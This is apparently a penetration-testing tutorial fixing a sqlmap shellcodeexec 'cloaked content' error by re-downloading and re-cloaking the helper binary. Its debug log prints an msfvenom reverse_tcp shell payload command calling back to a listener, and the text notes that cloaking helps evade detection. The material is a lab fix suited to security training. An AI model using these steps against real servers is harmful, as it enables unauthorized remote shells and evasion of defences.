While working through my Practical Guide to sqlmap for SQL Injections course, I ran into an issue with sqlmap’s included shellcodeexec.
There was an error when decompressing the data, and an error that says that our shellcodeexec.x32_ (or shellcodeexec.x64_) does not contain valid cloaked content.
Full error stack:
[16:59:32] [DEBUG] executing local command: /usr/bin/msfvenom -p linux/x86/shell/reverse_tcp EXITFUNC=process LPORT=4444 LHOST=10.0.2.15 -a x86 -e x86/alpha_mixed -f raw BufferRegister=EAX > "/home/kali/.local/share/sqlmap/output/localhost/tmpmksxy" [16:59:32] [INFO] creation in progress .... done [16:59:36] [DEBUG] the shellcode size is 150 bytes what is the back-end database management system architecture?  32-bit (default)  64-bit > 2 [16:59:37] [INFO] uploading shellcodeexec to '/var/www/html/tmpseksxy' Error -3 while decompressing data: incorrect header check ERROR: the provided input file '/home/kali/Documents/sqlmap-dev/extra/shellcodeexec/linux/shellcodeexec.x64_' does not contain valid cloaked content
The solution is really simple, so let’s get to it.
Download a fresh copy of shellcodeexec
Go to that repo and navigate to shellcodeexec/linux/shellcodeexec.x32 (or x64 or Windows DLLs if that’s what you need), copy the URL, and we’ll use wget to download this file:
└─$ wget -O ~/Documents/sqlmap-dev/extra/shellcodeexec/linux/shellcodeexec.x32 https://github.com/bdamele/shellcodeexec/blob/master/linux/shellcodeexec.x32?raw=true // Make sure the ?raw=true is there at the end, or you'll download the web page instead!
Where you download the file depends on where you’re running Kali from. If you downloaded Kali from GitHub, you should already know the path. If you’re using the default Kali installation (or whatever other OS you’re running), then you can use this to locate the path:
└─$ which sqlmap /usr/bin/sqlmap └─$ ls -l /usr/bin/sqlmap lrwxrwxrwx 1 root root 25 Feb 2 2021 /usr/bin/sqlmap -> ../share/sqlmap/sqlmap.py └─$ ls /usr/share/sqlmap
/usr/share/sqlmap/extra/shellcodeexec/linux/ is where you’d want to download it. This will require using wget with sudo though because the directory is owned by root. My
~/Documents/ isn’t owned by root, which is why I didn’t have to sudo.
Cloak the shellcodeexec
sqlmap includes a cloaking.py script file in /extra/cloak/cloak.py. This script file is used to encrypt and compress other files. This helps reduce the size of files we may want to upload to our target, and it can help evade detection from security controls on the target system.
So before we can use the newly downloaded shellcodeexec, we need to cloak it. All you need to do is call this script file on the newly-downloaded shellcodeexec file:
┌──(kali㉿kali)-[~/Documents/sqlmap-dev/extra/cloak] └─$ python3 ~/Documents/sqlmap-dev/extra/cloak/cloak.py -i ./shellcodeexec.x32
(Again, the path where you run this depends on your Kali path and where you downloaded the shellcodeexec file)
You should then see a new version created:
┌──(kali㉿kali)-[~/Documents/sqlmap-dev/extra/cloak] └─$ ls shellcodeexec.x32 shellcodeexec.x32_
The new file with the
_ is going to be the cloaked version, and it’s the version that sqlmap will automatically use, as long as the file is located where sqlmap will be looking for it, which will be
/extra/shellcodeexec/linux/ (for linux) or
/extra/shellcodeexec/windows/ (for windows).
You should now be able to re-run whatever command you were trying to use before, and it shouldn’t error out and it shouldn’t say ‘does not contain valid cloaked content’ anymore!